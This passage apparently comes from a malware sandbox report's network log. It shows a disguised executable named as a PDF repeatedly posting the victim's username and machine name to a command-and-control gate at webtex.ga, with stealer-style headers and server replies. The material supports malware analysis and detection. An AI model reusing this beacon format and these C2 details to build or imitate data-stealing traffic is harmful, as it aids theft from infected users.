                                    Dec 3, 2020 10:03:28.119638920 CET4660OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:28.169105053 CET4660INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:45 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    149192.168.2.34988847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:28.370666981 CET4661OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:28.387365103 CET4661OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:28.577908039 CET4661INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:45 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    15192.168.2.34972447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:34.377229929 CET85OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:34.393970013 CET85OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:34.437256098 CET85INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    150192.168.2.34988947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:28.995903015 CET4662OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:29.012512922 CET4662OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:29.054012060 CET4663INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    151192.168.2.34989047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:29.261435986 CET4663OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:29.277981043 CET4664OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:29.322722912 CET4664INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    152192.168.2.34989147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:29.906199932 CET4665OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:29.922723055 CET4665OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:29.963618040 CET4665INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:47 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    153192.168.2.34989247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:30.476260900 CET4666OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:30.492850065 CET4667OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:30.536401033 CET4667INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:47 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    154192.168.2.34989347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:30.994100094 CET4668OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:31.011329889 CET4668OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:31.054594994 CET4668INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    155192.168.2.34989447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:31.259182930 CET4669OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:31.286514044 CET4669OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:31.328924894 CET4670INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    156192.168.2.34989547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:31.751250982 CET4670OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:31.767699957 CET4671OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:31.807704926 CET4671INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    157192.168.2.34989647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:32.014316082 CET4672OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:32.030854940 CET4672OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:32.077872992 CET4672INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    158192.168.2.34989747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:32.604345083 CET4673OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:32.620944977 CET4673OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:32.665529966 CET4674INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    159192.168.2.34989847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:32.863168001 CET4675OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:32.880027056 CET4675OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:32.924294949 CET4675INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    16192.168.2.34972547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:34.827049971 CET86OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:34.843691111 CET86OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:34.971106052 CET87INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:52 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    160192.168.2.34989947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:33.437469006 CET4676OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:33.454191923 CET4676OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:33.495291948 CET4677INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    161192.168.2.34990047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:33.936414957 CET4677OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:33.953109026 CET4678OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:33.997836113 CET4678INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    162192.168.2.34990147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:34.447921038 CET4679OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:34.464618921 CET4679OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:34.507785082 CET4679INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    163192.168.2.34990247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:34.942137957 CET4680OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:34.958951950 CET4680OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:35.009032011 CET4681INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:52 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    164192.168.2.34990347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:35.504308939 CET4681OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:35.520961046 CET4682OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:35.563085079 CET4682INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:52 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    165192.168.2.34990447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:36.040003061 CET4683OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:36.061310053 CET4683OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:36.106219053 CET4683INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:53 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
